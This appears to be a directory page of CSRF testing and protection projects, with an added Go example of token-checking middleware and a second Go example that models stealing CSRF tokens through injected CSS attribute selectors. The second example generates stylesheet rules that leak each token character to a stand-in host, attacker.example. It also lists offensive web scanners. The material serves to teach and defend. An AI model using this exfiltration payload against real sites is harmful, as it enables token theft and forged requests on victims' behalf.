XSRFProbe - A CSRF Scanner Equipped with a Powerful Crawling Engine and Intelligent Token Generator.


XSRFProbe is an advanced Cross-Site Request Forgery audit toolkit equipped with powerful crawling and intelligent token generation capabilities. Use it with care: because the tool is designed to perform all kinds of form submissions automatically, it can sabotage the target site. You may corrupt its database, and you will most probably cause a denial of service as well.




Related Projects

csrf - gorilla/csrf provides Cross Site Request Forgery (CSRF) prevention middleware for Go web applications & services

  •    Go

gorilla/csrf is also compatible with middleware 'helper' libraries like Alice and Negroni. Once the middleware is in place, collect the token with csrf.Token(r) in your handlers before passing it to the template, JSON body or HTTP header.

nosurf - CSRF protection middleware for Go.

  •    Go

nosurf is an HTTP package for Go that helps you prevent Cross-Site Request Forgery attacks. It acts as middleware and is therefore compatible with basically any Go HTTP application. Even though CSRF is a prominent vulnerability, Go's web-related package infrastructure mostly consists of micro-frameworks that neither implement CSRF checks nor should they.
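To make concrete what middleware such as gorilla/csrf and nosurf does on every request, here is an added, self-contained Go example written for this page (it is not code from either project). It implements a simplified double-submit-cookie check on top of net/http: a random token is issued in an HttpOnly cookie, handlers read it back through a Token(r) helper that plays the same role as csrf.Token(r), and every non-safe request must echo it in an X-CSRF-Token header or a csrf_token form field. The cookie, header and field names are assumptions chosen for the illustration; the real libraries add per-request token masking and configuration options that this example omits.

```go
package main

import (
	"context"
	"crypto/rand"
	"crypto/subtle"
	"encoding/base64"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

const (
	csrfCookie = "_csrf"        // assumed cookie name holding the secret
	csrfHeader = "X-CSRF-Token" // assumed header for fetch/XHR clients
	csrfField  = "csrf_token"   // assumed form field for HTML forms
)

type ctxKey struct{}

// newToken returns 32 bytes from the CSPRNG, base64url-encoded.
func newToken() (string, error) {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	return base64.RawURLEncoding.EncodeToString(b), nil
}

// safeMethod reports whether the method is "safe" (RFC 7231 s4.2.1) and so
// must not change state; only unsafe methods get the token check.
func safeMethod(m string) bool {
	switch m {
	case http.MethodGet, http.MethodHead, http.MethodOptions, http.MethodTrace:
		return true
	}
	return false
}

// Token returns the request's CSRF token so a handler can embed it in a
// template, JSON body or response header (the role csrf.Token(r) plays).
func Token(r *http.Request) string {
	t, _ := r.Context().Value(ctxKey{}).(string)
	return t
}

// Protect is a simplified double-submit-cookie middleware. The token is kept
// in an HttpOnly cookie that the attacker's origin cannot read, and every
// unsafe request must echo it back in a header or form field; a forged
// cross-site form can send the cookie but cannot know what to echo.
func Protect(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		var tok string
		if c, err := r.Cookie(csrfCookie); err == nil && c.Value != "" {
			tok = c.Value
		} else {
			fresh, err := newToken()
			if err != nil {
				http.Error(w, "token generation failed", http.StatusInternalServerError)
				return
			}
			tok = fresh
			http.SetCookie(w, &http.Cookie{Name: csrfCookie, Value: tok, Path: "/",
				HttpOnly: true, Secure: true, SameSite: http.SameSiteLaxMode})
		}
		if !safeMethod(r.Method) {
			sent := r.Header.Get(csrfHeader)
			if sent == "" {
				sent = r.PostFormValue(csrfField)
			}
			// Constant-time compare so response timing cannot leak token bytes.
			if subtle.ConstantTimeCompare([]byte(sent), []byte(tok)) != 1 {
				http.Error(w, "Forbidden - CSRF token invalid", http.StatusForbidden)
				return
			}
		}
		next.ServeHTTP(w, r.WithContext(context.WithValue(r.Context(), ctxKey{}, tok)))
	})
}

// Exercise drives the middleware in-process and returns the status codes for
// a GET that issues the token, a POST with no token, a POST with a guessed
// token, and a POST echoing the issued token in the form field.
func Exercise() (get, missing, wrong, ok int) {
	h := Protect(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprint(w, Token(r)) // a real handler would render this into the form
	}))
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, httptest.NewRequest(http.MethodGet, "/form", nil))
	get = rec.Code
	token, cookie := rec.Body.String(), rec.Result().Cookies()[0]

	post := func(body string) int {
		req := httptest.NewRequest(http.MethodPost, "/transfer", strings.NewReader(body))
		req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
		req.AddCookie(cookie) // the browser attaches it whether the form is genuine or forged
		rec := httptest.NewRecorder()
		h.ServeHTTP(rec, req)
		return rec.Code
	}
	missing = post("amount=100")
	wrong = post("amount=100&" + csrfField + "=AAAA")
	ok = post("amount=100&" + csrfField + "=" + token)
	return
}

func main() {
	get, missing, wrong, ok := Exercise()
	fmt.Printf("GET=%d POST(no token)=%d POST(guess)=%d POST(valid)=%d\n", get, missing, wrong, ok)
}
```

Running it prints GET=200, 403 for the two forged POSTs and 200 for the legitimate one. Because the cookie is HttpOnly, the server must hand the token to the page itself, which is exactly the "collect the token with csrf.Token(r) and pass it to the template or JSON body" step described above; JSON clients then send it back in the header rather than a form field. SameSite=Lax on the cookie is a defence in depth, not a replacement for the check.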

csurf - CSRF token middleware

  •    Javascript

Node.js CSRF protection middleware. Requires either a session middleware or cookie-parser to be initialized first.

cssInjection - Stealing CSRF tokens with CSS injection (without iFrames)

  •    HTML

An earlier post details a method for stealing sensitive data with CSS injection by using attribute selectors and iframes. Because that method requires iframes, and most major websites disallow being framed, the attack isn't always practical. Here I'll detail a way to do this without iframes, effectively stealing a CSRF token in about 10 seconds.
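As an added illustration of the attribute-selector technique the description refers to (example code written for this page, not the project's own), the Go program below builds the per-prefix CSS rules an attacker would inject and then models the browser's selector matching to show how each round leaks one more character of the field's value. The field name csrf_token, the hex alphabet, the callback host https://attacker.example and the sample token are all constructed assumptions.

```go
package main

import (
	"fmt"
	"strings"
)

// charset is the alphabet the token is assumed to be drawn from (hex here).
const charset = "0123456789abcdef"

// selectorFor builds one injected rule: it matches only when the input's
// value starts with prefix, and a match makes the browser fetch host/prefix,
// which tells the attacker that this prefix is correct.
func selectorFor(field, prefix, host string) string {
	return fmt.Sprintf(`input[name="%s"][value^="%s"]{background:url(%s/%s)}`,
		field, prefix, host, prefix)
}

// payload returns the stylesheet for one round: a rule for every
// one-character extension of the prefix recovered so far.
func payload(field, known, host string) string {
	var sb strings.Builder
	for _, c := range charset {
		sb.WriteString(selectorFor(field, known+string(c), host))
		sb.WriteByte('\n')
	}
	return sb.String()
}

// fires models the browser: given the injected stylesheet and the real value
// of the field, it returns the callback URLs whose rules match. At most one
// rule per round can match because the prefixes differ in their last char.
func fires(css, value, host string) []string {
	var out []string
	marker := `[value^="`
	for _, rule := range strings.Split(strings.TrimSpace(css), "\n") {
		start := strings.Index(rule, marker)
		if start < 0 {
			continue
		}
		start += len(marker)
		end := strings.Index(rule[start:], `"`)
		if end < 0 {
			continue
		}
		prefix := rule[start : start+end]
		if strings.HasPrefix(value, prefix) {
			out = append(out, host+"/"+prefix)
		}
	}
	return out
}

// recoverToken runs the attacker's loop: inject, observe which callback
// arrives, extend the known prefix by the leaked character, repeat. It stops
// early if a round produces no callback (the charset assumption was wrong).
func recoverToken(field, secret, host string) (string, int) {
	known, rounds := "", 0
	for len(known) < len(secret) {
		rounds++
		hits := fires(payload(field, known, host), secret, host)
		if len(hits) != 1 {
			break
		}
		known = strings.TrimPrefix(hits[0], host+"/")
	}
	return known, rounds
}

func main() {
	// Constructed sample: in the real attack this value sits in the victim page.
	token := "3f9a1c2d7e8b4605"
	host := "https://attacker.example"
	got, rounds := recoverToken("csrf_token", token, host)
	fmt.Printf("recovered %q in %d rounds\n", got, rounds)
	fmt.Print(payload("csrf_token", got[:2], host)) // the stylesheet round 3 would inject
}
```

Two caveats the model leaves out. First, an input of type="hidden" is not rendered, so its background image is never requested; real payloads therefore point the rule at a visible element (for example with a sibling combinator after the matching input) or target a token that appears on a rendered element. Second, each round needs the stylesheet to be re-injected with the longer prefix, which is the part the iframe-free approach above changes; the fix on the defender's side is to remove the CSS injection itself (output encoding, a style-src Content Security Policy), since the selector trick works against any attribute value once injection is possible.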

NeatHtml - Displays untrusted content securely, efficiently, and accessibly

  •    ASPNET

NeatHtml™ is a highly-portable open source website component that displays untrusted content securely, efficiently, and accessibly. Untrusted content is any content that is not trusted by the website owner (e.g. blog comments, forum posts, or user pages on social networks).

flask-wtf - Simple integration of Flask and WTForms, including CSRF, file upload and Recaptcha integration

  •    Python

Simple integration of Flask and WTForms, including CSRF, file upload, and reCAPTCHA.

xssor - XSSOR: a convenient tool for XSS and CSRF, http://evilcos.me/lab/xssor/

  •    Javascript


BlackWidow - A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target website

  •    Python

BlackWidow is a Python-based web application spider that gathers subdomains, URLs, dynamic parameters, email addresses and phone numbers from a target website. The project also includes the Inject-X fuzzer to scan dynamic URLs for common OWASP vulnerabilities. This software is released under the GNU General Public License v3.0. See LICENSE.md for details.

IIS Secure Parameter Filter (SPF)


SPF is an application security module for Microsoft IIS web servers. SPF provides instant out-of-the-box protection against Parameter Tampering, Cross-Site Scripting (XSS), URL Manipulation, Cross-Site Request Forgery (CSRF), and Session Hijacking/Replay attacks.


  •    Java

Java-based Open Source WAF (Web Application Firewall) to include inside a web application in order to protect it against attacks like SQL Injection, Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Parameter Manipulation and many more.


  •    Java

The move towards Single Page Apps and RESTful services opens the door to a much better way of securing web applications. Traditional web applications use browser cookies to identify a user when a request is made to the server. This approach is fundamentally flawed: the browser attaches those cookies automatically to every request, including ones forged from another site, which is why so many applications are vulnerable to Cross-Site Request Forgery (CSRF) attacks. When used correctly, RESTful services can avoid this vulnerability altogether. Before we go into the solution, let's recap the problem. HTTP is a stateless protocol: make a request and get a response; make another request and get another response. There is no correlation (i.e. "state") between these requests. This poses a problem when you need to identify a user to the system, because one request logs the user in and another request needs to tell the server who is making it.


  •    PHP

Training and education about web security

Spock - Another Haskell web framework for rapid development

  •    Haskell

Newer versions of Spock drop simple routing in favor of typesafe routing, and drop safe actions in favor of the "usual" way of CSRF protection with a token. If you wish to continue using the untyped version of Spock you can use Web.Spock.Simple. The routing is implemented in a separate Haskell package called reroute.

express-state - Share configuration and state data of an Express app with the client-side via JavaScript

  •    Javascript

Share configuration and state data of an Express app with the client side via JavaScript. Express State is designed to make it easy to share configuration and state data from the server to the client. It can be used to share any data that needs to be available to the client-side JavaScript code of an app: e.g., the current user, a CSRF token, model data, routes, etc.

WebSploit Framework


TIDoS-Framework - The Offensive Manual Web Application Penetration Testing Framework.

  •    Python

NOTE: For installing globally, you will need to default your Python version to 2.x. However, the work of migrating from Python 2 to Python 3 is already underway. TIDoS needs some libraries to run, which can be installed via the aptitude or yum package managers.





single-page php shopping cart script